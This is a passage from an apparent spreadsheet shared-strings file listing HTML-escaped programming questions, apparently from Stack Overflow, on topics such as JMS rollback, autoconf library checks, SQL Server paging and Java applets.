&lt;li&gt;I want to know if writes and reads are atomic on multiple CPUs?&lt;/li&gt;
&lt;li&gt;I understand what volatile is about. But is it enough? Do I need to use interlocked operations if I want to get latest value writen by other CPU? &lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>JMS rollback</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a process which involves sending a JMS message.
The process is part of a transaction.
If a later part of the transaction fails, a part that is after a previous part that sent the message, I need to cancel the message.
One thought I had was to somehow set on the message that it is not to be picked up for a certain amount of time, and if I need to rollback, then I could go and cancel the message.
Not knowing messaging, I do not know if the idea is possible.
Or, is there a better idea?
Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SharePoint Workflows - How to associate with specific content types (particularly folders)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I noticed when working with SharePoint Designer that each workflow has a config xml with  tags.  Does anyone know how to:
1) Associate the workflow with a specific content type?
2) Know if it is possible to associate a workflow with folders?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using MSMQ for interprocess(inter application) communication on Windows Mobile 5.0</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a Native Embedded VC (EVC4.0) application running on a Windows Mobile 5 device. Now there is a requirement to get this application to talk with a new mobile application to be developed using either EVC4.0 or .Net CF. 
We were thinking of using MSMQ on the Windows Mobile device for inter process communication between these 2 apps. &lt;/p&gt;
&lt;p&gt;Has anyone used MSMQ for this kind of reason before?&lt;/p&gt;
&lt;p&gt;Thanks,
-Sid&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Code reusability - App_Code or BIN or UserControls?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I recently had a discussion on another forum with another developer and the topic was Code Reuse in ASP.NET. The stated scenario was that he needs to update code frequently on Production servers during server uptimes, and this results in Session getting reset for all users. He is avoiding putting shared code or classes into the App_Code folder or precompiled DLL's into the Bin folder because any updates will also refresh the Session.&lt;/p&gt;
&lt;p&gt;The solution he has come up with is to put his shared code into UserControls and reference them wherever required. This enables him to update only the UserControl files which would be recompiled dynamically on next request without forcing a Session restart. Note that the Usercontrols are not intended to have any UI, they probably only house some business logic.&lt;/p&gt;
&lt;p&gt;I tried to convince him against this because it felt intrinsically wrong to me - but I could not provide any hard facts to support my claim that this was a very bad way of doing things. The only thing I could think of is that it violates the principle of separation of business logic from UI. Am I grossly mistaken or are there concrete reasons why this should not be done? Links or examples would be helpful.&lt;/p&gt;
&lt;p&gt;Note: &lt;em&gt;Using out-of-process Session state is not an option at present, nor have they been able to decide on scheduled downtimes. Also, since this is a site under active development, they don't seem to be using any sort of professional deployment model yet.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
&lt;p&gt;Edit: Additionally, it would be helpful if someone could clarify exactly why the Session restarts in the above mentioned cases.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get Team Build to show test results and coverage for xUnit.net test suite?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anybody had any success getting Team Build to show xUnit.net test results and code coverage in the build report?  The MSBuild runner is running the tests just fine and the results are in the log file, but the test results and code coverage results areas of the build report say "No test result" and "No coverage result" respectively.  Is Team Build looking for a certain location / format for the test results to be exported by the xUnit.net runner?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Library resolution with autoconf?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm building my first autoconf managed package.&lt;/p&gt;
&lt;p&gt;However I can't find any simple examples anywhere of how to specify a required library, and find that library where it might be in various different places.&lt;/p&gt;
&lt;p&gt;I've currently got:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;AC_CHECK_LIB(['event'], ['event_init'])
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;It doesn't find the version installed in &lt;code&gt;/opt/local/lib&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;It doesn't complain if the library isn't actually found&lt;/li&gt;
&lt;li&gt;I need to set the include path to &lt;code&gt;/opt/local/include&lt;/code&gt; too&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;any help, or links to decent tutorials much appreciated...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When NOT to use the Entity Framework</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been playing around with the EF to see what it can handle. Also many articles and posts explain the various scenarios in which the EF can be used, however if miss the "con" side somehow. Now my question is, &lt;strong&gt;in what kind of scenarios should I stay away from the Entity Framework&lt;/strong&gt; ?&lt;/p&gt;
&lt;p&gt;If you have some experience in this field, tell me what scenarios don't play well with the EF. Tell me about some downsides you experienced where you whished you would have chosen a different technology.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>URLLoader annoying problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i am trying to load a variable through php from a sql database but i get nothing&lt;/p&gt;
&lt;p&gt;here is the code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var Idfield;
var loader:URLLoader = new URLLoader();
// data will come as URL encoded variables
loader.dataFormat = URLLoaderDataFormat.VARIABLES;
loader.load(new URLRequest("pull.php"));
loader.addEventListener(Event.COMPLETE,dataload);									  
function dataload(e:Event){
	Idfield =e.target.data["id"];
	trace(Idfield);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;here is the php code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   $query = "SELECT max(id) from $tablename";
    $result = mysql_query($query) 
		or die("no rows selected");
    $row = mysql_fetch_row($result); // extracts one row
    echo  "id=$row[0]";
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Refactor "using" directives over an entire codebase?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;One of the things I love about Visual Studio 2008 is the ability to refactor and reorganize the "using" directives in source code files (this may have been in 2005 as well, I don't remember).&lt;/p&gt;
&lt;p&gt;Specifically, I'm talking about how you can have it both reorganize the directives to be alphabetical (though with the core FCL libraries floating to the top) and removing any directives which don't need to be there (either never used or no longer used).&lt;/p&gt;
&lt;p&gt;Is there any way to automate this refactoring (the sorting and trimming) across an entire old codebase? Either through all of the files in a solution or across multiple solution files.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to order categories in WordPress?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use &lt;code&gt;wp_list_categories()&lt;/code&gt; to get the list of all the categories and generate the navigation bar. Is there a way to order these categories in a particular order other than alphabetical ordering. &lt;/p&gt;
&lt;p&gt;eg: Connect, News &amp;amp; Views, Q&amp;amp;A, Hello Startup, Startup 101...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>COM C# Memory leak Tracing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to find out the memory usage of each dll within a c# application using com dll's?  Or what would you say is the best way to find out why memory grows exponentially when using a com object (IE. Whether the COM object has a memory leak, or whether some special freeing up of objects passed to managed code has to occur(and/or how to do that)).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to clear python interpreter console?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Like most Python developers, I typically keep a console window open with the Python interpreter running to test commands, dir() stuff, help() stuff, etc.&lt;/p&gt;
&lt;p&gt;Like any console, after a while the visible backlog of past commands and prints gets to be cluttered, and sometimes confusing when re-running the same command several times.  I'm wondering if, and how, to clear the Python interpreter console.&lt;/p&gt;
&lt;p&gt;I've heard about doing a system call and either calling &lt;code&gt;cls&lt;/code&gt; on Windows or &lt;code&gt;clear&lt;/code&gt; on Linux, but I was hoping there was something I could command the interpreter itself to do.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; I'm running on Windows, so Ctrl+L doesn't work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is JavaScript a pass-by-reference or pass-by-value language?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The primitive types (Number, String, etc.) are passed by value, but Objects are unknown, because they can be both passed-by-value (in case we consider that a variable holding an object is in fact a reference to the object) and passed-by-reference (when we consider that the variable to the object holds the object itself).&lt;/p&gt;
&lt;p&gt;Although it doesn't really matter at the end, I want to know what is the correct way to present the arguments passing conventions. Is there an excerpt from JavaScript specification, which defines what should be the semantics regarding this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to control the target frame of reporting services (SSRS) drill down</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using SQL 2005 reporting services (SSRS) with the web report viewer control. It is showing the report inside an IFRAME on the web page. If I implement a drill down functionality, by attaching a URL action to a chart elements, the navigation will happen only inside the IFRAME. I know how to set the target frame for navigation on a normal HTML page. But in the report definition (RDL) I can't find any property to select the target frame.
Any solution or workaround?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I set a form to have a transparent background</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am struggling to get my form to have a transparent background in vb.net &lt;/p&gt;
&lt;p&gt;Currently in the form New I set &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Me.SetStyle(ControlStyles.SupportsTransparentBackColor, true) 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But still the form shows up as having the default grey background&lt;/p&gt;
&lt;p&gt;Can anyone help??&lt;/p&gt;
&lt;p&gt;EDIT: I need the controls on the form to be visible so I don't think setting the opacity to 0 will work&lt;/p&gt;
&lt;p&gt;EDIT: I tried the transparency key solution  but it doesn't work. I have a circular image with a black background. OnPaint I set the transparency key to the img pixel at 0,0, this then leaves me with circular image (which I want ) It hides the black background but I am still left with the default grey rectangle of the form. &lt;/p&gt;
&lt;p&gt;below is the code I have - &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Public Sub New()
    Me.SetStyle(ControlStyles.SupportsTransparentBackColor, True)
    Me.BackColor = Color.Transparent
    ' This call is required by the Windows Form Designer.
    InitializeComponent()
    ' Add any initialization after the InitializeComponent() call.
    Me.Timer1.Start()
End Sub
Private Sub frmWoll_Paint(ByVal sender As Object, ByVal e As System.Windows.Forms.PaintEventArgs) Handles Me.Paint
    Dim img As Bitmap = CType(Me.BackgroundImage, Bitmap)
    img.MakeTransparent(img.GetPixel(2, 2))
    Me.TransparencyKey = img.GetPixel(2, 2)
End Sub
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>When is it time to have a QA department?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The Quality Assurance (QA) department is roughly a bunch of testers debunking your app(s) all day, giving the green light for releases, handling Alpha / Beta programs. And much more.&lt;/p&gt;
&lt;p&gt;But without a QA department in a software company, issues arises too often in the field, and problems costs more to fix. However, most companies starts in a garage, with 1 employee being yourself, and then grows into a software company.&lt;/p&gt;
&lt;p&gt;When do you tell it's to create such department ? Anything to do with the size of the company, the problems it encounters ? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where is a good Address Parser</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a good tool that can take a full mailing address, formatted for display or use with a mailing label, and convert it into a structured object.&lt;/p&gt;
&lt;p&gt;So for instance:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Start with a formatted address in a single string
string f = "18698 E. Main Street\r\nBig Town, AZ, 86011";
// Parse into address
Address addr = new Address(f);
addr.Street; // 18698 E. Main Street
addr.Locality; // Big Town
addr.Region; // AZ
addr.PostalCode; // 86011
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I could do this using RegEx. But the tricky part is keeping it general enough to handle any address in the world!&lt;/p&gt;
&lt;p&gt;I'm sure there has to be something out there that can do it.&lt;/p&gt;
&lt;p&gt;If anyone noticed, this is actually the format of the &lt;a href="http://code.google.com/apis/opensocial/docs/0.8/reference/#opensocial.Address"&gt;opensocial.address&lt;/a&gt; object.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Possible to do a glow/shadow using partial transparency in HTML/CSS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Well I guess this is a two part question.&lt;/p&gt;
&lt;p&gt;Firstly how can I make an image have partial transparency (I think you can do this with PNGs but don't know how -- I have photoshop just need instructions?)&lt;/p&gt;
&lt;p&gt;Secondly how do I use that image in a layout using CSS?  I think I need some kind of "PNG Hack"&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I control repeated Ajax 'post' submissions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I do not want to stop the user from clicking the same ajax button many times, but I want to exercise some control to prevent someone from maliciously clicking the button repeatedly which would cause repeated database requests. What is simple way to handle this on a jquery .post in asp.net mvc? If I put in a time delay, the experience client side will be ruined (?) &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Google Adwords API 'getKeywordVariations' not working properly</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use the 'GetKeywordVariations' method of the google adwords API, documentation at &lt;a href="http://code.google.com/apis/adwords/docs/developer/KeywordToolService.html#getKeywordVariations" rel="nofollow"&gt;this page. According to the documentation, it should return these fields&lt;/a&gt;, including lastMonthSearchVolume. When I try this, i get all the fields except for lastMonthSearchVolume. Does anyone know why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>rotate a UIView around its center but several times</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to rotate some &lt;code&gt;UIView&lt;/code&gt; around its center, so the simple code goes something like 
(in pseudocode):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[UIView beginAnimations:@"crazyRotate" context:nil];
[UIView setAnimationDuration:1.0];
someview.transform = CGAffineTransformMakeRotation(angle);
[UIView commitAnimations]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;now if I set angle to say M_PI/2 the thing rotates nicely.
if I set it to 2*M_PI, well it does "nothing". I can understand that the matrix translates to something that does nothing (rotating 360 means "stay" in a sense),
yet, I want to rotate it 5 times (think of a newspaper rotate scale coming at you effect -- I'm not great at describing, hope someone understands).
So, I tried adding setting angle to 180 deg (M_PI) and add a nested &lt;code&gt;animatationBlock&lt;/code&gt;. 
but I guess that since I'm setting the same property (&lt;code&gt;someview.transition&lt;/code&gt;) again it ignores it somehow).
I tried setting repeat count of the animation to 2 with angle M_PI but it seems to simply rotate 180, going back to straight position and then initiating the rotate again.&lt;/p&gt;
&lt;p&gt;So, I'm a little out of ideas,
any help appreciated!
--t&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# Settings Rembering Settings</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I get my program to remember the users settings?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem with simple full-text search on SQL Server 2005</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I just setup full-text search on my development database. I setup a new full-text index on a table and included 2 columns in the index. The first column is called 'description' and is a 'varchar(100)' and the other column is called 'notes' and is a 'text' column.&lt;/p&gt;
&lt;p&gt;I am trying to perform a simple search like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select *
from myTable
where freetext(description, 'another')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I know for sure that there is at least one row where the 'description' column contains the word 'another' as the first word. However, the search produces 0 results. Searching for other words seems to work fine.&lt;/p&gt;
&lt;p&gt;Also, when I setup my full-text index I told it to automatically update the index and to go ahead and build the index right away. The database hasn't changed at all since I did that.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Select Users by Total Submissions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know this is an easy one, but it's driving me nuts...&lt;/p&gt;
&lt;p&gt;I have a users table, comments table, and pictures table.&lt;/p&gt;
&lt;p&gt;I want a list of the top 10 users based on submissions (total of their comments and their submitted photos).&lt;/p&gt;
&lt;p&gt;That's it.&lt;/p&gt;
&lt;p&gt;Shame me.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;UPDATE:  based on Ed's answer.&lt;/p&gt;
&lt;p&gt;here's my setup:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;users table (user_id, username)&lt;/li&gt;
&lt;li&gt;images table (img_id, submittedby_id = users.user_id) &lt;/li&gt;
&lt;li&gt;comments table (id, submittedby_id = users.user_id)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;and the final query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    select submittedby_id, sum(total)
from 
    (select submittedby_id, count(img_id) as total from    
          images group by submittedby_id 
     union 
     select submittedby_id, count(id) as total from 
          comments group by submittedby_id
    ) as x
 group by submittedby_id 
 order by sum(total) desc limit 10;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Make async event synchronous in JavaScript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using the WPF 3.5SP1 WebBrowser control to display a page containing some javascript functions.
My program then needs to invoke a javascript function which will make an asynchronous call. I need a way to get the result of that asynchronous call back to C# so I can process the result.&lt;/p&gt;
&lt;p&gt;Is there a way I can make the first javascript function sleep until something happens (with out locking up the browser)?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;edit:&lt;/strong&gt; I am already using a call back - the 2nd function is actually called "some-async-function-complete". It gets called when the async event finishes. Now I need a way to get the result into C#.&lt;/p&gt;
&lt;p&gt;For further clarification:
C#&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var result = WebBrowser.InvokeScript("myscript")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;JavaScript&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var result;
function myscript()
{
some-async-function();
/* what goes here? */
/* wait until result != null */
return result;
}
function some-async-function-complete(retval)
{
result = retval;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Getting the status of a stream from FMS in ActionScript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a way to get the status of a stream from Flash Media Server to action script. I need to know if a stream has any publishers/listeners from flex/ActionScript.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Setting the width of a menu in the Windows API</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm creating a custom control in wxWidgets that displays a menu as part of it, and currently working on the Windows side of things.  wxWidgets doesn't have a way of setting the width of a menu.  It just makes the window as wide as the longest string plus a few pixels on either side.&lt;/p&gt;
&lt;p&gt;In the API, there is a way to get the actual Windows API menu handle.  Does the Windows API have a method of setting the width of a menu other than just calculating it on its own based on the width of the string?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Compare subselect value with value in master select</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In MS Access, I have a query where I want to use a column in the outer query as a condition in the inner query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT P.FirstName, P.LastName, Count(A.attendance_date) AS CountOfattendance_date,
       First(A.attendance_date) AS FirstOfattendance_date,
       (SELECT COUNT (*) 
          FROM(SELECT DISTINCT attendance_date 
                FROM tblEventAttendance AS B 
                WHERE B.event_id=8 
                  AND B.attendance_date &amp;gt;= FirstOfattendance_date)
       ) AS total
FROM tblPeople AS P INNER JOIN tblEventAttendance AS A ON P.ID = A.people_id
WHERE A.event_id=8
GROUP BY P.FirstName, P.LastName
;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The key point is &lt;code&gt;FirstOfattendance_date&lt;/code&gt; - I want the comparison deep in the subselect to  use the value in each iteration of the master select.  Obviously this doesn't work, it asks me for the value of &lt;code&gt;FirstOfattendance_date&lt;/code&gt; when I try to run it.&lt;/p&gt;
&lt;p&gt;I'd like to do this without resorting to VB code... any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Upgrade to 3.5 SP1 &amp; 3.5 Family Update on client systems can break my code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a server hosting a remoting application using .NET 3.5.  It has been running fine.  In the last couple of days I have had numerous reports of users not being able to access the application after running the "Microsoft .NET Framework 3.5 Service Pack 1 and .NET Framework 3.5 Family Update (KB951847) x86" update.&lt;/p&gt;
&lt;p&gt;I am tempted to run this update on the server - but don't want to cause any problems with my users that have not run this Windows Update.  &lt;/p&gt;
&lt;p&gt;I can update my application, but I see from other questions on SO that this shouldn't be an issue - as my dev machine does not have SP1 on it, so the app is not using anything that is dependent on SP1.&lt;/p&gt;
&lt;p&gt;Any thoughts on what might be happening?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get a simple, Hello World Java applet to work in a browser in Mac OS X?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Java SE 1.6 on Mac OS X 10.5.6.  The code for my applet is as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import java.awt.Graphics;
import javax.swing.JApplet;
public class HelloWorld extends JApplet {
    public void paint( Graphics g ) {
            super.paint( g );
            g.drawString( "Hello World!", 25, 25 );
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I compiled this to a &lt;em&gt;.class&lt;/em&gt; file.  The code for my HTML file is as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
    &amp;lt;title&amp;gt;Hello World&amp;lt;/title&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
    &amp;lt;applet code="HelloWorld.class" height="300" width="300"&amp;gt;
            Your browser is ignoring the applet tag.
    &amp;lt;/applet&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I run the applet with &lt;em&gt;appletviewer&lt;/em&gt;, it works fine.  However, if I open the HTML file in a browser, a square appears for the applet space, but the applet doesn't load.  (The "Your browser is ignoring the applet tag." doesn't appear either.)  The browser status bar shows two messages:  &lt;strong&gt;Applet HelloWorld notloaded&lt;/strong&gt; and &lt;strong&gt;Loading Java Applet Failed...&lt;/strong&gt;  I tried the applet with Firefox 3.0.6, Safari 3.2.1, and Opera 9.6.3.  None of them could load the applet.&lt;/p&gt;
&lt;p&gt;If I try opening the HTML for one of the Java demo applets in &lt;em&gt;/Developer/Examples/Java/Applets&lt;/em&gt;, it loads fine in all three browsers.&lt;/p&gt;
&lt;p&gt;Is there something I'm missing here, in trying to get this simple applet to load in a browser?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How are web servers best loaded</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If a web server is going to serve out say 100GB per day would it be better for it to do so in 10,000 10MB sessions or 200,000 500kB sessions.&lt;/p&gt;
&lt;p&gt;The reason for this question is I'm wondering if there would be any advantage, disadvantage or neither to sites that mirror content to allow clients to exploit HTTP's start-in-the-middle feature to download files in segments from many servers. (IIRC this is a little like bit torrent works) &lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ function that returns string doesn't work unless there's an endl involved...?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a function inside of a class that returns a string. Inside this function, I can only get it to work when I add  &lt;code&gt;cout&amp;lt;&amp;lt;endl&lt;/code&gt;  to the function before the return statement. Any idea why this is, or how I can fix it? I'm running this in Eclipse on a Mac&lt;/p&gt;
&lt;p&gt;In "main.cpp":&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;iostream&amp;gt;
#include &amp;lt;fstream&amp;gt;
#include &amp;lt;string&amp;gt;
#include &amp;lt;vector&amp;gt;
#include &amp;lt;cstdlib&amp;gt;
#include "Braid.h"
using namespace std;
static int size=3;
int main(){  
Braid * b1 = new Braid(size);
b1-&amp;gt;setCanon();//creates canonical braid. 
cout&amp;lt;&amp;lt;"a ";
cout&amp;lt;&amp;lt;b1-&amp;gt;getName()&amp;lt;&amp;lt;endl;
cout&amp;lt;&amp;lt;" b ";
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In "Braid.h" :  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  public:  
        Braid(int);  
        void setCanon();  
        string getName(); 
    };
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And in "Braid.cpp":  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string Braid::getName(){  
    string sName="";  
    /* body commented out
    for(int i=0; i&amp;lt;height; i++)
    {
    	for(int j=2; j&amp;lt;(width-2); j++)
        	{
        	    sName += boxes[i][j];
        	    sName += "|";
        	}
        }
        */  
        //cout&amp;lt;&amp;lt;endl;
        return sName;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I run my main code, without the body of that function commented, the output I get is&lt;br /&gt;
 &lt;strong&gt;"a 0|0|12|12|0|0|2|1|1|1|1|2|"&lt;/strong&gt;  &lt;/p&gt;
&lt;p&gt;The "name" it returns is correct, but it's not making it past the function call. If I uncomment the &lt;code&gt;//cout&amp;lt;&amp;lt;endl&lt;/code&gt; line, the function works and my output is&lt;br /&gt;
 &lt;strong&gt;"a 0|0|12|12|0|0|2|1|1|1|1|2|&lt;br /&gt;
b "&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;After commenting out the body of the function, so that it only creates an empty string, and returns it, my output is only "a"  then if I add the endl back, I get the "a b" that is expected.&lt;/p&gt;
&lt;p&gt;What am I doing wrong? Is there something that comes with endl that I'm missing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Beginner's guide to 3D graphics programming</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the best guides / tutorials / books / websites for someone with minimal experience (or none) in the world of 3D graphics programming?&lt;/p&gt;
&lt;p&gt;I realize that the fundamentals of 3D graphics and mathematics apply across platform specific 3D library implementations such as OpenGL, DirectX, WPF etc..&lt;/p&gt;
&lt;p&gt;Therefore it would be useful if answers would explain if they focus on a specific library implementation, on the fundamentals, or maybe both.&lt;/p&gt;
&lt;p&gt;Rationale for for asking this question:  &lt;/p&gt;
&lt;p&gt;With Windows Presentation Foundation (WPF) 3D on the scene, it's realistic for many programmers to now seriously consider using 3D for their applications, where this would have been almost impossible even a few years ago. &lt;/p&gt;
&lt;p&gt;I'm sure there are many programmers out there, like me, who find the leap from 2D to 3D a very big one.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MSSQL Paging is returning random rows when not supposed too</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to do some basic paging in MSSQL. The problem I'm having is that I'm sorting the paging on a row that (potentially) has similar values, and the ORDER BY clause is returning "random" results, which doesn't work well.&lt;/p&gt;
&lt;p&gt;So for example.&lt;/p&gt;
&lt;p&gt;If I have three rows, and I'm sorting them by a "rating", and all of the ratings are = '5' - the rows will seemingly "randomly" order themselves. How do I make it so the rows are showing up in the same order everytime?&lt;/p&gt;
&lt;p&gt;I tried ordering it by a datetime that the field was last edited, but the "rating" is sorted in reverse, and again, does not work how i expect it to work.&lt;/p&gt;
&lt;p&gt;Here is the SQL I'm using thus far. I know it's sort of confusing without the data so.. any help would be greatful.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * FROM 
(
  SELECT 
    CAST(grg.defaultthumbid AS VARCHAR) + '_' + 
    CAST(grg.garageid AS VARCHAR) AS imagename,
    (
      SELECT COUNT(imageid) 
      FROM dbo.images im (nolock) 
      WHERE im.garageid = grg.garageid
    ) AS piccount, 
    (
      SELECT COUNT(commentid) 
      FROM dbo.comments cmt (nolock) 
      WHERE cmt.garageid = grg.garageid
    ) AS commentcount,
    grg.GarageID, mk.make, mdl.model, grg.year, 
    typ.type, usr.username, grg.content, 
    grg.rating, grg.DateEdit as DateEdit,
    ROW_NUMBER() OVER (ORDER BY Rating DESC) As RowIndex 
  FROM 
    dbo.garage grg (nolock)
    LEFT JOIN dbo.users (nolock) AS usr ON (grg.userid = usr.userid)
    LEFT JOIN dbo.make (nolock) AS mk ON (grg.makeid = mk.makeid)
    LEFT JOIN dbo.type (nolock) AS typ ON (typ.typeid = mk.typeid)
    LEFT JOIN dbo.model (nolock) AS mdl ON (grg.modelid = mdl.modelid)
  WHERE 
    typ.type = 'Automobile' AND
    grg.defaultthumbid != 0 AND
    usr.username IS NOT NULL
) As QueryResults 
WHERE 
  RowIndex BETWEEN (2 - 1) * 25 + 2 AND 2 * 25
ORDER BY 
  DateEdit DESC
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Find the path of notepad.exe and mspaint.exe</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to find out where notepad.exe and mspaint.exe are that will work across various versions of Windows?&lt;/p&gt;
&lt;p&gt;Should I get the Windows directory via &lt;a href="https://msdn.microsoft.com/en-us/library/windows/desktop/bb762181(v=vs.85).aspx" rel="nofollow"&gt;&lt;code&gt;SHGetFolderPath(NULL, CSIDL_WINDOWS, NULL, SHGFP_TYPE_CURRENT, dir)&lt;/code&gt;&lt;/a&gt;, and then traverse through all the subdirectories to look for the two files?&lt;/p&gt;
&lt;p&gt;(Assume that I am not interested in anything outside the Windows folder.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Difference between static class and singleton pattern?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What real (i.e. practical) difference exists between a static class and a singleton pattern?&lt;/p&gt;
&lt;p&gt;Both can be invoked without instantiation, both provide only one "Instance" and neither of them is thread-safe. Is there any other difference?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>X connection to localhost:10.0 broken (explicit kill or server shutdown)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;why is this error comes.  I started the jboss server and when i try to open the application in IE i am getting this error&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to pass a method as an argument in Objective-C?</t>
  </si>
  <si>
